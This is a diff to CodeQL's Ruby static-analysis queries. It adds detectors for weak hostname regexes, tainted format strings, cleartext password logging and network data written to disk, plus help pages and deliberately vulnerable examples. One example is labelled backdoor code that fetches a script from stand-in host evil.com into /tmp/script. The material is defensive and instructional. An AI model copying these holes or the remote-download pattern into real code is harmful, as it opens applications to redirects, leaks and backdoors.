+    cls.getNumChild() = 1 and
+    cls.getAChild().(RegExpConstant).getValue() = "."
+  )
+}
+
+/** Holds if `term` is a wildcard `.` or an actual `.` character. */
+predicate isDotLike(RegExpTerm term) {
+  term instanceof RegExpDot
+  or
+  isDotConstant(term)
+}
+
+/** Holds if `term` will only ever be matched against the beginning of the input. */
+predicate matchesBeginningOfString(RegExpTerm term) {
+  term.isRootTerm()
+  or
+  exists(RegExpTerm parent | matchesBeginningOfString(parent) |
+    term = parent.(RegExpSequence).getChild(0)
+    or
+    parent.(RegExpSequence).getChild(0) instanceof RegExpCaret and
+    term = parent.(RegExpSequence).getChild(1)
+    or
+    term = parent.(RegExpAlt).getAChild()
+    or
+    term = parent.(RegExpGroup).getAChild()
+  )
+}
+
+/**
+ * Holds if the given sequence contains top-level domain preceded by a dot, such as `.com`,
+ * excluding cases where this is at the very beginning of the regexp.
+ *
+ * `i` is bound to the index of the last child in the top-level domain part.
+ */
+predicate hasTopLevelDomainEnding(RegExpSequence seq, int i) {
+  seq.getChild(i)
+      .(RegExpConstant)
+      .getValue()
+      .regexpMatch("(?i)" + RegExpPatterns::getACommonTld() + "(:\\d+)?([/?#].*)?") and
+  isDotLike(seq.getChild(i - 1)) and
+  not (i = 1 and matchesBeginningOfString(seq))
+}
+
+/**
+ * Holds if the given regular expression term contains top-level domain preceded by a dot,
+ * such as `.com`.
+ */
+predicate hasTopLevelDomainEnding(RegExpSequence seq) { hasTopLevelDomainEnding(seq, _) }
+
+/**
+ * Holds if `term` will always match a hostname, that is, all disjunctions contain
+ * a hostname pattern that isn't inside a quantifier.
+ */
+predicate alwaysMatchesHostname(RegExpTerm term) {
+  hasTopLevelDomainEnding(term, _)
+  or
+  // `localhost` is considered a hostname pattern, but has no TLD
+  term.(RegExpConstant).getValue().regexpMatch("\\blocalhost\\b")
+  or
+  not term instanceof RegExpAlt and
+  not term instanceof RegExpQuantifier and
+  alwaysMatchesHostname(term.getAChild())
+  or
+  alwaysMatchesHostnameAlt(term)
+}
+
+/** Holds if every child of `alt` contains a hostname pattern. */
+predicate alwaysMatchesHostnameAlt(RegExpAlt alt) {
+  alwaysMatchesHostnameAlt(alt, alt.getNumChild() - 1)
+}
+
+/**
+ * Holds if the first `i` children of `alt` contains a hostname pattern.
+ *
+ * This is used instead of `forall` to avoid materializing the set of alternatives
+ * that don't contains hostnames, which is much larger.
+ */
+predicate alwaysMatchesHostnameAlt(RegExpAlt alt, int i) {
+  alwaysMatchesHostname(alt.getChild(0)) and i = 0
+  or
+  alwaysMatchesHostnameAlt(alt, i - 1) and
+  alwaysMatchesHostname(alt.getChild(i))
+}
+
+/**
+ * Holds if `term` occurs inside a quantifier or alternative (and thus
+ * can not be expected to correspond to a unique match), or as part of
+ * a lookaround assertion (which are rarely used for capture groups).
+ */
+predicate isInsideChoiceOrSubPattern(RegExpTerm term) {
+  exists(RegExpParent parent | parent = term.getParent() |
+    parent instanceof RegExpAlt
+    or
+    parent instanceof RegExpQuantifier
+    or
+    parent instanceof RegExpSubPattern
+    or
+    isInsideChoiceOrSubPattern(parent)
+  )
+}
+
+/**
+ * Holds if `group` is likely to be used as a capture group.
+ */
+predicate isLikelyCaptureGroup(RegExpGroup group) {
+  group.isCapture() and
+  not isInsideChoiceOrSubPattern(group)
+}
+
+/**
+ * Holds if `seq` contains two consecutive dots `..` or escaped dots.
+ *
+ * At least one of these dots is not intended to be a subdomain separator,
+ * so we avoid flagging the pattern in this case.
+ */
+predicate hasConsecutiveDots(RegExpSequence seq) {
+  exists(int i |
+    isDotLike(seq.getChild(i)) and
+    isDotLike(seq.getChild(i + 1))
+  )
+}
+
+predicate isIncompleteHostNameRegExpPattern(RegExpTerm regexp, RegExpSequence seq, string msg) {
+  seq = regexp.getAChild*() and
+  exists(RegExpDot unescapedDot, int i, string hostname |
+    hasTopLevelDomainEnding(seq, i) and
+    not isConstantInvalidInsideOrigin(seq.getChild([0 .. i - 1]).getAChild*()) and
+    not isLikelyCaptureGroup(seq.getChild([i .. seq.getNumChild() - 1]).getAChild*()) and
+    unescapedDot = seq.getChild([0 .. i - 1]).getAChild*() and
+    unescapedDot != seq.getChild(i - 1) and // Should not be the '.' immediately before the TLD
+    not hasConsecutiveDots(unescapedDot.getParent()) and
+    hostname =
+      seq.getChild(i - 2).getRawValue() + seq.getChild(i - 1).getRawValue() +
+        seq.getChild(i).getRawValue()
+  |
+    if unescapedDot.getParent() instanceof RegExpQuantifier
+    then
+      // `.*\.example.com` can match `evil.com/?x=.example.com`
+      //
+      // This problem only occurs when the pattern is applied against a full URL, not just a hostname/origin.
+      // We therefore check if the pattern includes a suffix after the TLD, such as `.*\.example.com/`.
+      // Note that a post-anchored pattern (`.*\.example.com$`) will usually fail to match a full URL,
+      // and patterns with neither a suffix nor an anchor fall under the purview of MissingRegExpAnchor.
+      seq.getChild(0) instanceof RegExpCaret and
+      not seq.getAChild() instanceof RegExpDollar and
+      seq.getChild([i .. i + 1]).(RegExpConstant).getValue().regexpMatch(".*[/?#].*") and
+      msg =
+        "has an unrestricted wildcard '" + unescapedDot.getParent().(RegExpQuantifier).getRawValue()
+          + "' which may cause '" + hostname +
+          "' to be matched anywhere in the URL, outside the hostname."
+    else
+      msg =
+        "has an unescaped '.' before '" + hostname +
+          "', so it might match more hosts than expected."
+  )
+}
+
+predicate incompleteHostnameRegExp(
+  RegExpSequence hostSequence, string message, DataFlow::Node aux, string label
+) {
+  exists(RegExpPatternSource re, RegExpTerm regexp, string msg, string kind |
+    regexp = re.getRegExpTerm() and
+    isIncompleteHostNameRegExpPattern(regexp, hostSequence, msg) and
+    (
+      if re.getAParse() != re
+      then (
+        kind = "string, which is used as a regular expression $@," and
+        aux = re.getAParse()
+      ) else (
+        kind = "regular expression" and aux = re
+      )
+    )
+  |
+    message = "This " + kind + " " + msg and label = "here"
+  )
+}
--- a/ruby/ql/src/queries/security/cwe-020/HostnameRegexpSpecific.qll
+++ b/ruby/ql/src/queries/security/cwe-020/HostnameRegexpSpecific.qll
@@ -0,0 +1,2 @@
+import codeql.ruby.security.performance.RegExpTreeView
+import codeql.ruby.DataFlow
--- a/ruby/ql/src/queries/security/cwe-020/IncompleteHostnameRegExp.qhelp
+++ b/ruby/ql/src/queries/security/cwe-020/IncompleteHostnameRegExp.qhelp
@@ -0,0 +1,72 @@
+<!DOCTYPE qhelp PUBLIC
+"-//Semmle//qhelp//EN"
+"qhelp.dtd">
+<qhelp>
+
+	<overview>
+		<p>
+
+			Sanitizing untrusted URLs is an important technique for
+			preventing attacks such as request forgeries and malicious
+			redirections. Often, this is done by checking that the host of a URL
+			is in a set of allowed hosts.
+
+		</p>
+
+		<p>
+
+			If a regular expression implements such a check, it is
+			easy to accidentally make the check too permissive by not escaping the
+			<code>.</code> meta-characters appropriately.
+
+			Even if the check is not used in a security-critical
+			context, the incomplete check may still cause undesirable behaviors
+			when it accidentally succeeds.
+
+		</p>
+	</overview>
+
+	<recommendation>
+		<p>
+
+			Escape all meta-characters appropriately when constructing
+			regular expressions for security checks, and pay special attention to the
+			<code>.</code> meta-character.
+
+		</p>
+	</recommendation>
+
+	<example>
+
+		<p>
+
+			The following example code checks that a URL redirection
+			will reach the <code>example.com</code> domain, or one of its
+			subdomains.
+
+		</p>
+
+		<sample src="examples/IncompleteHostnameRegExp.rb"/>
+
+		<p>
+
+			The check is however easy to bypass because the unescaped
+			<code>.</code> allows for any character before
+			<code>example.com</code>, effectively allowing the redirect to go to
+			an attacker-controlled domain such as <code>wwwXexample.com</code>.
+
+		</p>
+		<p>
+
+			Address this vulnerability by escaping <code>.</code>
+			appropriately: <code>regex = /^((www|beta)\.)?example\.com/</code>.
+
+		</p>
+
+	</example>
+
+	<references>
+		<li>OWASP: <a href="https://www.owasp.org/index.php/Server_Side_Request_Forgery">SSRF</a></li>
+		<li>OWASP: <a href="https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html">XSS Unvalidated Redirects and Forwards Cheat Sheet</a>.</li>
+	</references>
+</qhelp>
--- a/ruby/ql/src/queries/security/cwe-020/IncompleteHostnameRegExp.ql
+++ b/ruby/ql/src/queries/security/cwe-020/IncompleteHostnameRegExp.ql
@@ -0,0 +1,16 @@
+/**
+ * @name Incomplete regular expression for hostnames
+ * @description Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected.
+ * @kind problem
+ * @problem.severity warning
+ * @security-severity 7.8
+ * @precision high
+ * @id rb/incomplete-hostname-regexp
+ * @tags correctness
+ *       security
+ *       external/cwe/cwe-020
+ */
+
+import HostnameRegexpShared
+
+query predicate problems = incompleteHostnameRegExp/4;
--- a/ruby/ql/src/queries/security/cwe-020/examples/IncompleteHostnameRegExp.rb
+++ b/ruby/ql/src/queries/security/cwe-020/examples/IncompleteHostnameRegExp.rb
@@ -0,0 +1,13 @@
+class AppController < ApplicationController
+
+    def index
+        url = params[:url]
+        host = URI(url).host
+        # BAD: the host of `url` may be controlled by an attacker
+        regex = /^((www|beta).)?example.com/
+        if host.match(regex)
+            redirect_to url
+        end
+    end
+
+end
--- a/ruby/ql/src/queries/security/cwe-134/TaintedFormatString.qhelp
+++ b/ruby/ql/src/queries/security/cwe-134/TaintedFormatString.qhelp
@@ -0,0 +1,50 @@
+<!DOCTYPE qhelp PUBLIC
+  "-//Semmle//qhelp//EN"
+  "qhelp.dtd">
+<qhelp>
+
+<overview>
+<p>
+Methods like <code>Kernel.printf</code> accept a format string that is used to format
+the remaining arguments by providing inline format specifiers. If the format string
+contains unsanitized input from an untrusted source, then that string may contain
+unexpected format specifiers that cause garbled output or throw an exception.
+</p>
+</overview>
+
+<recommendation>
+<p>
+Either sanitize the input before including it in the format string, or use a
+<code>%s</code> specifier in the format string, and pass the untrusted data as corresponding
+argument.
+</p>
+</recommendation>
+
+<example>
+<p>
+The following program snippet logs information about an unauthorized access attempt. The
+log message includes the user name, and the user's IP address is passed as an additional
+argument to <code>Kernel.printf</code> to be appended to the message:
+</p>
+<sample src="examples/tainted_format_string_bad.rb"/>
+<p>
+However, if a malicious user provides a format specified such as <code>%s</code>
+as their user name, <code>Kernel.printf</code> will throw an exception as there
+are too few arguments to satisfy the format. This can result in denial of
+service or leaking of internal information to the attacker via a stack trace.
+</p>
+<p>
+Instead, the user name should be included using the <code>%s</code> specifier:
+</p>
+<sample src="examples/tainted_format_string_good.rb"/>
+
+<p>
+Alternatively, string interpolation should be used exclusively:
+</p>
+<sample src="examples/tainted_format_string_interpolation.rb"/>
+</example>
+
+<references>
+<li>Ruby documentation for <a href="https://docs.ruby-lang.org/en/3.1/Kernel.html#method-i-sprintf">format strings</a>.</li>
+</references>
+</qhelp>
--- a/ruby/ql/src/queries/security/cwe-134/TaintedFormatString.ql
+++ b/ruby/ql/src/queries/security/cwe-134/TaintedFormatString.ql
@@ -0,0 +1,21 @@
+/**
+ * @name Use of externally-controlled format string
+ * @description Using external input in format strings can lead to garbled output.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 7.3
+ * @precision high
+ * @id rb/tainted-format-string
+ * @tags security
+ *       external/cwe/cwe-134
+ */
+
+import ruby
+import codeql.ruby.DataFlow
+import codeql.ruby.security.TaintedFormatStringQuery
+import DataFlow::PathGraph
+
+from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink
+where cfg.hasFlowPath(source, sink)
+select sink.getNode(), source, sink, "$@ flows here and is used in a format string.",
+  source.getNode(), "User-provided value"
--- a/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_bad.rb
+++ b/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_bad.rb
@@ -0,0 +1,5 @@
+class UsersController < ActionController::Base
+  def index
+    printf("Unauthorised access attempt by #{params[:user]}: %s", request.ip)
+  end
+end
--- a/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_good.rb
+++ b/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_good.rb
@@ -0,0 +1,5 @@
+class UsersController < ActionController::Base
+  def index
+    printf("Unauthorised access attempt by %s: %s", params[:user], request.ip)
+  end
+end
--- a/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_interpolation.rb
+++ b/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_interpolation.rb
@@ -0,0 +1,5 @@
+class UsersController < ActionController::Base
+  def index
+    puts "Unauthorised access attempt by #{params[:user]}: #{request.ip}"
+  end
+end
--- a/ruby/ql/src/queries/security/cwe-312/CleartextStorage.qhelp
+++ b/ruby/ql/src/queries/security/cwe-312/CleartextStorage.qhelp
@@ -0,0 +1,51 @@
+<!DOCTYPE qhelp PUBLIC
+  "-//Semmle//qhelp//EN"
+  "qhelp.dtd">
+<qhelp>
+
+<overview>
+<p>
+Sensitive information that is stored unencrypted is accessible to an attacker
+who gains access to the storage.
+</p>
+</overview>
+
+<recommendation>
+<p>
+Ensure that sensitive information is always encrypted before being stored.
+</p>
+<p>
+In general, decrypt sensitive information only at the point where it is
+necessary for it to be used in cleartext.
+</p>
+
+<p>
+
+Be aware that external processes often store the <code>standard
+out</code> and <code>standard error</code> streams of the application,
+causing logged sensitive information to be stored as well.
+
+</p>
+
+</recommendation>
+
+<example>
+<p>
+The following example code stores user credentials (in this case, their password)
+to disk in plain text:
+</p>
+<sample src="examples/CleartextStorageBad.rb"/>
+<p>
+Instead, the credentials should be masked or redacted before storing:
+</p>
+<sample src="examples/CleartextStorageGood.rb"/>
+</example>
+
+
+<references>
+
+<li>M. Dowd, J. McDonald and J. Schuhm, <i>The Art of Software Security Assessment</i>, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.</li>
+<li>M. Howard and D. LeBlanc, <i>Writing Secure Code</i>, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.</li>
+
+</references>
+</qhelp>
--- a/ruby/ql/src/queries/security/cwe-312/CleartextStorage.ql
+++ b/ruby/ql/src/queries/security/cwe-312/CleartextStorage.ql
@@ -0,0 +1,25 @@
+/**
+ * @name Clear-text storage of sensitive information
+ * @description Storing sensitive information without encryption or hashing can
+ *              expose it to an attacker.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 7.5
+ * @precision high
+ * @id rb/clear-text-storage-sensitive-data
+ * @tags security
+ *       external/cwe/cwe-312
+ *       external/cwe/cwe-359
+ *       external/cwe/cwe-532
+ */
+
+import ruby
+import codeql.ruby.security.CleartextStorageQuery
+import codeql.ruby.security.CleartextStorageCustomizations::CleartextStorage
+import codeql.ruby.DataFlow
+import DataFlow::PathGraph
+
+from Configuration config, DataFlow::PathNode source, DataFlow::PathNode sink
+where config.hasFlowPath(source, sink)
+select source.getNode(), source, sink, "Sensitive data returned by $@ is stored $@.",
+  source.getNode(), source.getNode().(Source).describe(), sink.getNode(), "here"
--- a/ruby/ql/src/queries/security/cwe-312/examples/CleartextStorageBad.rb
+++ b/ruby/ql/src/queries/security/cwe-312/examples/CleartextStorageBad.rb
@@ -0,0 +1,7 @@
+class UserSession
+  def login(username, password)
+    # ...
+    logfile = File.open("login_attempts.log")
+    logfile.puts "login with password: #{password})"
+  end
+end
--- a/ruby/ql/src/queries/security/cwe-312/examples/CleartextStorageGood.rb
+++ b/ruby/ql/src/queries/security/cwe-312/examples/CleartextStorageGood.rb
@@ -0,0 +1,8 @@
+class UserSession
+  def login(username, password)
+    # ...
+    password_escaped = password.sub(/.*/, "[redacted]")
+    logfile = File.open("login_attempts.log")
+    logfile.puts "login with password: #{password_escaped})"
+  end
+end
--- a/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp
+++ b/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp
@@ -0,0 +1,43 @@
+<!DOCTYPE qhelp PUBLIC
+"-//Semmle//qhelp//EN"
+"qhelp.dtd">
+<qhelp>
+
+<overview>
+  <p>
+    Storing user-controlled data on the local file system without
+    further validation allows arbitrary file upload, and may be
+    an indication of malicious backdoor code that has been
+    implanted into an otherwise trusted code base.
+  </p>
+</overview>
+
+<recommendation>
+  <p>
+    Examine the highlighted code closely to ensure that it is
+    behaving as intended.
+  </p>
+</recommendation>
+
+<example>
+  <p>
+    The following example shows backdoor code that downloads data
+    from the URL <code>https://evil.com/script</code>, and stores
+    it in the local file <code>/tmp/script</code>.
+  </p>
+
+  <sample src="examples/http_to_file_access.rb"/>
+
+  <p>
+    Other parts of the program might then assume that since
+    <code>/tmp/script</code> is a local file its contents can be
+    trusted, while in fact they are obtained from an untrusted
+    remote source.
+  </p>
+</example>
+
+<references>
+  <li>OWASP: <a href="https://www.owasp.org/index.php/Trojan_Horse">Trojan Horse</a>.</li>
+  <li>OWASP: <a href="https://www.owasp.org/index.php/Unrestricted_File_Upload">Unrestricted File Upload</a>.</li>
+</references>
+</qhelp>
--- a/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.ql
+++ b/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.ql
@@ -0,0 +1,21 @@
+/**
+ * @name Network data written to file
+ * @description Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 6.3
+ * @precision medium
+ * @id rb/http-to-file-access
+ * @tags security
+ *       external/cwe/cwe-912
+ *       external/cwe/cwe-434
+ */
+
+import ruby
+import codeql.ruby.DataFlow
+import codeql.ruby.DataFlow::DataFlow::PathGraph
+import codeql.ruby.security.HttpToFileAccessQuery
+
+from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink
+where cfg.hasFlowPath(source, sink)
+select sink.getNode(), source, sink, "$@ flows to file system", source.getNode(), "Untrusted data"
--- a/ruby/ql/src/queries/security/cwe-912/examples/http_to_file_access.rb
+++ b/ruby/ql/src/queries/security/cwe-912/examples/http_to_file_access.rb
@@ -0,0 +1,5 @@
+require "net/http"
+
+resp = Net::HTTP.new("evil.com").get("/script").body
+file = File.open("/tmp/script", "w")
+file.write(body)
--- a/ruby/ql/test/library-tests/dataflow/api-graphs/test1.rb
+++ b/ruby/ql/test/library-tests/dataflow/api-graphs/test1.rb
@@ -62,3 +62,9 @@ M1::C1.new.m #$ use=getMember("M1").getMember("C1").getMethod("new").getReturn()
 M2::C3.new.m #$ use=getMember("M2").getMember("C3").getMethod("new").getReturn().getMethod("m").getReturn()

 Foo.foo(a,b:c) #$ use=getMember("Foo").getMethod("foo").getReturn() def=getMember("Foo").getMethod("foo").getParameter(0) def=getMember("Foo").getMethod("foo").getKeywordParameter("b")
+
+def userDefinedFunction(x, y)
+    x.noApiGraph(y)
+    x.customEntryPointCall(y) #$ call=CustomEntryPointCall use=CustomEntryPointCall.getReturn() rhs=CustomEntryPointCall.getParameter(0)
+    x.customEntryPointUse(y) #$ use=CustomEntryPointUse
+end
--- a/ruby/ql/test/library-tests/dataflow/api-graphs/use.ql
+++ b/ruby/ql/test/library-tests/dataflow/api-graphs/use.ql
@@ -3,6 +3,20 @@ import codeql.ruby.DataFlow
 import TestUtilities.InlineExpectationsTest
 import codeql.ruby.ApiGraphs

+class CustomEntryPointCall extends API::EntryPoint {
+  CustomEntryPointCall() { this = "CustomEntryPointCall" }
+
+  override DataFlow::CallNode getACall() { result.getMethodName() = "customEntryPointCall" }
+}
+
+class CustomEntryPointUse extends API::EntryPoint {
+  CustomEntryPointUse() { this = "CustomEntryPointUse" }
+
+  override DataFlow::LocalSourceNode getAUse() {
+    result.(DataFlow::CallNode).getMethodName() = "customEntryPointUse"
+  }
+}
+
 class ApiUseTest extends InlineExpectationsTest {
  ApiUseTest() { this = "ApiUseTest" }

@@ -16,6 +30,9 @@ class ApiUseTest extends InlineExpectationsTest {
      or
      tag = "def" and
      n = a.getARhs()
+      or
+      tag = "call" and
+      n = a.(API::MethodAccessNode).getCallNode()
    )
  }

--- a/ruby/ql/test/library-tests/dataflow/summaries/Summaries.expected
+++ b/ruby/ql/test/library-tests/dataflow/summaries/Summaries.expected
@@ -2,6 +2,14 @@ edges
 | summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:2:6:2:12 | tainted |
 | summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:4:24:4:30 | tainted :  |
 | summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:16:36:16:42 | tainted :  |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:20:25:20:31 | tainted :  |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:26:31:26:37 | tainted :  |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:30:24:30:30 | tainted :  |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:31:27:31:33 | tainted :  |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:34:16:34:22 | tainted |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:35:16:35:22 | tainted |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:36:21:36:27 | tainted |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:37:36:37:42 | tainted |
 | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:1:11:1:26 | call to identity :  |
 | summaries.rb:4:12:7:3 | call to apply_block :  | summaries.rb:9:6:9:13 | tainted2 |
 | summaries.rb:4:24:4:30 | tainted :  | summaries.rb:4:12:7:3 | call to apply_block :  |
@@ -11,6 +19,19 @@ edges
 | summaries.rb:16:12:16:43 | call to apply_lambda :  | summaries.rb:18:6:18:13 | tainted3 |
 | summaries.rb:16:36:16:42 | tainted :  | summaries.rb:11:17:11:17 | x :  |
 | summaries.rb:16:36:16:42 | tainted :  | summaries.rb:16:12:16:43 | call to apply_lambda :  |
+| summaries.rb:20:12:20:32 | call to firstArg :  | summaries.rb:21:6:21:13 | tainted4 |
+| summaries.rb:20:25:20:31 | tainted :  | summaries.rb:20:12:20:32 | call to firstArg :  |
+| summaries.rb:26:12:26:38 | call to secondArg :  | summaries.rb:27:6:27:13 | tainted5 |
+| summaries.rb:26:31:26:37 | tainted :  | summaries.rb:26:12:26:38 | call to secondArg :  |
+| summaries.rb:30:24:30:30 | tainted :  | summaries.rb:30:6:30:42 | call to onlyWithBlock |
+| summaries.rb:31:27:31:33 | tainted :  | summaries.rb:31:6:31:34 | call to onlyWithoutBlock |
+| summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:41:24:41:24 | t :  |
+| summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:42:24:42:24 | t :  |
+| summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:44:8:44:8 | t :  |
+| summaries.rb:41:24:41:24 | t :  | summaries.rb:41:8:41:25 | call to matchedByName |
+| summaries.rb:42:24:42:24 | t :  | summaries.rb:42:8:42:25 | call to matchedByName |
+| summaries.rb:44:8:44:8 | t :  | summaries.rb:44:8:44:27 | call to matchedByNameRcv |
+| summaries.rb:48:24:48:30 | "taint" :  | summaries.rb:48:8:48:31 | call to preserveTaint |
 nodes
 | summaries.rb:1:11:1:26 | call to identity :  | semmle.label | call to identity :  |
 | summaries.rb:1:20:1:26 | "taint" :  | semmle.label | "taint" :  |
@@ -25,6 +46,29 @@ nodes
 | summaries.rb:16:12:16:43 | call to apply_lambda :  | semmle.label | call to apply_lambda :  |
 | summaries.rb:16:36:16:42 | tainted :  | semmle.label | tainted :  |
 | summaries.rb:18:6:18:13 | tainted3 | semmle.label | tainted3 |
+| summaries.rb:20:12:20:32 | call to firstArg :  | semmle.label | call to firstArg :  |
+| summaries.rb:20:25:20:31 | tainted :  | semmle.label | tainted :  |
+| summaries.rb:21:6:21:13 | tainted4 | semmle.label | tainted4 |
+| summaries.rb:26:12:26:38 | call to secondArg :  | semmle.label | call to secondArg :  |
+| summaries.rb:26:31:26:37 | tainted :  | semmle.label | tainted :  |
+| summaries.rb:27:6:27:13 | tainted5 | semmle.label | tainted5 |
+| summaries.rb:30:6:30:42 | call to onlyWithBlock | semmle.label | call to onlyWithBlock |
+| summaries.rb:30:24:30:30 | tainted :  | semmle.label | tainted :  |
+| summaries.rb:31:6:31:34 | call to onlyWithoutBlock | semmle.label | call to onlyWithoutBlock |
+| summaries.rb:31:27:31:33 | tainted :  | semmle.label | tainted :  |
+| summaries.rb:34:16:34:22 | tainted | semmle.label | tainted |
+| summaries.rb:35:16:35:22 | tainted | semmle.label | tainted |
+| summaries.rb:36:21:36:27 | tainted | semmle.label | tainted |
+| summaries.rb:37:36:37:42 | tainted | semmle.label | tainted |
+| summaries.rb:40:7:40:13 | "taint" :  | semmle.label | "taint" :  |
+| summaries.rb:41:8:41:25 | call to matchedByName | semmle.label | call to matchedByName |
+| summaries.rb:41:24:41:24 | t :  | semmle.label | t :  |
+| summaries.rb:42:8:42:25 | call to matchedByName | semmle.label | call to matchedByName |
+| summaries.rb:42:24:42:24 | t :  | semmle.label | t :  |
+| summaries.rb:44:8:44:8 | t :  | semmle.label | t :  |
+| summaries.rb:44:8:44:27 | call to matchedByNameRcv | semmle.label | call to matchedByNameRcv |
+| summaries.rb:48:8:48:31 | call to preserveTaint | semmle.label | call to preserveTaint |
+| summaries.rb:48:24:48:30 | "taint" :  | semmle.label | "taint" :  |
 subpaths
 invalidSpecComponent
 invalidOutputSpecComponent
@@ -34,3 +78,23 @@ invalidOutputSpecComponent
 | summaries.rb:9:6:9:13 | tainted2 | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:9:6:9:13 | tainted2 | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
 | summaries.rb:12:8:12:8 | x | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:12:8:12:8 | x | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
 | summaries.rb:18:6:18:13 | tainted3 | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:18:6:18:13 | tainted3 | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:21:6:21:13 | tainted4 | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:21:6:21:13 | tainted4 | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:27:6:27:13 | tainted5 | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:27:6:27:13 | tainted5 | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:30:6:30:42 | call to onlyWithBlock | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:30:6:30:42 | call to onlyWithBlock | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:31:6:31:34 | call to onlyWithoutBlock | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:31:6:31:34 | call to onlyWithoutBlock | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:34:16:34:22 | tainted | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:34:16:34:22 | tainted | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:35:16:35:22 | tainted | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:35:16:35:22 | tainted | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:36:21:36:27 | tainted | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:36:21:36:27 | tainted | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:37:36:37:42 | tainted | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:37:36:37:42 | tainted | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:41:8:41:25 | call to matchedByName | summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:41:8:41:25 | call to matchedByName | $@ | summaries.rb:40:7:40:13 | "taint" :  | "taint" :  |
+| summaries.rb:42:8:42:25 | call to matchedByName | summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:42:8:42:25 | call to matchedByName | $@ | summaries.rb:40:7:40:13 | "taint" :  | "taint" :  |
+| summaries.rb:44:8:44:27 | call to matchedByNameRcv | summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:44:8:44:27 | call to matchedByNameRcv | $@ | summaries.rb:40:7:40:13 | "taint" :  | "taint" :  |
+| summaries.rb:48:8:48:31 | call to preserveTaint | summaries.rb:48:24:48:30 | "taint" :  | summaries.rb:48:8:48:31 | call to preserveTaint | $@ | summaries.rb:48:24:48:30 | "taint" :  | "taint" :  |
+warning
+| CSV type row should have 5 columns but has 2: test;TooFewColumns |
+| CSV type row should have 5 columns but has 8: test;TooManyColumns;;;Member[Foo].Instance;too;many;columns |
+| Invalid argument '0-1' in token 'Argument[0-1]' in access path: Method[foo].Argument[0-1] |
+| Invalid argument '*' in token 'Argument[*]' in access path: Method[foo].Argument[*] |
+| Invalid token 'Argument' is missing its arguments, in access path: Method[foo].Argument |
+| Invalid token 'Member' is missing its arguments, in access path: Method[foo].Member |
+| Invalid token name 'Arg' in access path: Method[foo].Arg[0] |
--- a/ruby/ql/test/library-tests/dataflow/summaries/Summaries.ql
+++ b/ruby/ql/test/library-tests/dataflow/summaries/Summaries.ql
@@ -8,12 +8,15 @@ import DataFlow::PathGraph
 import codeql.ruby.TaintTracking
 import codeql.ruby.dataflow.internal.FlowSummaryImpl
 import codeql.ruby.dataflow.internal.AccessPathSyntax
+import codeql.ruby.frameworks.data.ModelsAsData

 query predicate invalidSpecComponent(SummarizedCallable sc, string s, string c) {
  (sc.propagatesFlowExt(s, _, _) or sc.propagatesFlowExt(_, s, _)) and
  Private::External::invalidSpecComponent(s, c)
 }

+query predicate warning = ModelOutput::getAWarning/0;
+
 query predicate invalidOutputSpecComponent(SummarizedCallable sc, AccessPath s, AccessPathToken c) {
  sc.propagatesFlowExt(_, s, _) and
